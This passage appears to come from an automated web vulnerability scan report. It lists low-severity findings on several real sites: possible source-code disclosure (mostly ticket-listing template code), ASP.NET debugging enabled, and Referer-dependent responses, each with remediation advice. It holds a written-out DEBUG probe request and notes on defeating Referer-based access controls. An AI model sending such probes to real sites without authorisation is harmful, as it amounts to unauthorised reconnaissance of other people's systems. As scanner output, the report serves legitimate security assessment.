<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.6. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: OR7ncKwYvc5cp5ICj0h8IEPnrtRoILVjGMI3SFA2P8fmjLESYfEqvpeAXoGi3JEm
x-amz-request-id: FFE99421EFAA9283
Date: Tue, 12 Jul 2011 18:00:07 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:02:29 GMT
ETag: "375af793d6130c7c9074d680589bbc99"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 157752
Server: AmazonS3
Age: 606816
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1259b8a58779033176a8a5bdb0f722368a3dd31bd8535769ebfa4dc25deb986bd74e3129c6d8c0b6
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row <%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row: <%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.7. http://www.seapine.com/ttpro.html previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.seapine.com
Path:	/ttpro.html

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content= HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579

Response

17. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.clickmanage.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clickmanage.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 19 Jul 2011 14:20:24 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18. Referer-dependent response previous next
There are 18 instances of this issue:

http://bing.fansnap.com/checkout/index/415814268
http://bing.fansnap.com/checkout/index/418563179
http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669
http://feeds.feedburner.com/netsparker
http://support.microsoft.com/contactus/cu_sc_prodact_master
http://support.microsoft.com/gp/csa
http://vimeo.com/moogaloop.swf
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.fansnap.com/developers
http://www.microsoft.com/worldwide/
http://www.youtube.com/v/JmxL5BlVzZQ
http://www.youtube.com/v/LpBCsQQ_v0U&autoplay=1
http://www.youtube.com/v/O3iZU0WCuwc&autoplay=1
http://www.youtube.com/v/QO6L5AtZ5kE&autoplay=1
http://www.youtube.com/v/tYy3w4lIafA&autoplay=1

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

